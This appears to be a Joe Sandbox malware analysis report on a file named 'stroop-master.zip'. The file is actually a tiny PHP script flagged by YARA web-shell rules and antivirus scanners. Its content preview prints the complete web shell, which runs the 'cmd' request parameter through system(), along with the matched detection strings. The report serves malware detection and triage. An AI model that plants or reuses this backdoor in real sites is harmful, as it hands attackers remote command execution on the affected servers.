Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
stroop-master.zip

Overview

General Information

Sample name:stroop-master.zip
Analysis ID:1430585
MD5:5127dd7dec482d81ea1d10be3d7c31d1
SHA1:11c57fe7eee4518cce026962ee42aedfd4b4fc03
SHA256:b31580e55640ffde6967ba13303b4207bb49242dba5168e695a530ce26a032ff
Infos:
Errors
  • No process behavior to analyse as no analysis process or sample was found

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara signature match

Classification

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
stroop-master.zipwebshell_simple_backdoorWeb Shell - file simple-backdoor.phpFlorian Roth
  • 0x46:$s0: $cmd = ($_REQUEST['cmd']);
  • 0x9:$s1: if(isset($_REQUEST['cmd'])){
  • 0x6a:$s4: system($cmd);
stroop-master.zipWebShell_Simple_PHP_backdoor_by_DKPHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.phpFlorian Roth
  • 0x9:$s6: if(isset($_REQUEST['cmd'])){
  • 0x6a:$s8: system($cmd);

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: stroop-master.zipReversingLabs: Detection: 32%

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: stroop-master.zip, type: SAMPLEMatched rule: Web Shell - file simple-backdoor.php Author: Florian Roth
Source: stroop-master.zip, type: SAMPLEMatched rule: PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php Author: Florian Roth
Source: stroop-master.zip, type: SAMPLEMatched rule: webshell_simple_backdoor date = 2014/01/28, author = Florian Roth, description = Web Shell - file simple-backdoor.php, score = f091d1b9274c881f8e41b2f96e6b9936
Source: stroop-master.zip, type: SAMPLEMatched rule: WebShell_Simple_PHP_backdoor_by_DK author = Florian Roth, description = PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php, hash = 03f6215548ed370bec0332199be7c4f68105274e
Source: classification engineClassification label: mal56.winZIP@0/0@0/0
Source: stroop-master.zipReversingLabs: Detection: 32%

Mitre Att&ck Matrix

No Mitre Att&ck techniques found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
stroop-master.zip32%ReversingLabsScript-PHP.Backdoor.Yorcirekrikseng

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1430585
Start date and time:2024-04-23 22:48:08 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 2m 10s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsinteractivecookbook.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:11
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:stroop-master.zip
Detection:MAL
Classification:mal56.winZIP@0/0@0/0
Cookbook Comments:
  • Found application associated with file extension: .zip

Errors

  • No process behavior to analyse as no analysis process or sample was found

Warnings

  • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • VT rate limit hit for: stroop-master.zip

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:PHP script, ASCII text, with CRLF line terminators
Entropy (8bit):4.449015511855094
TrID:
    File name:stroop-master.zip
    File size:170 bytes
    MD5:5127dd7dec482d81ea1d10be3d7c31d1
    SHA1:11c57fe7eee4518cce026962ee42aedfd4b4fc03
    SHA256:b31580e55640ffde6967ba13303b4207bb49242dba5168e695a530ce26a032ff
    SHA512:5996b9d9e8c3a08392297d70de860d60ffdf20a39d8eb3108d0da74e1424a9baa7937abf04638b061e46256911abfec33f1a106c12c7ccf7df499e1f72951533
    SSDEEP:3:ZoUogv9G87MAdFFFBe5VX+Xv/FBiFQ29G87M36mITBMeWFZe5KVDov/TTv:WU9vk1OFB2+X7kk1U1W3z8X
    TLSH:CFC04CA23A4E911562748475424D2814E445414F54209B1574DEA061AF3B0BBA5F89BC
    File Content Preview:<?php....if(isset($_REQUEST['cmd'])){.. echo "<pre>";.. $cmd = ($_REQUEST['cmd']);.. system($cmd);.. echo "</pre>";.. die;..}....?>....

    File Icon

    Icon Hash:1c1c1e4e4ececedc

    Network Behavior

    No network behavior found

    Statistics

    No statistics

    System Behavior

    No system behavior

    Disassembly

    No disassembly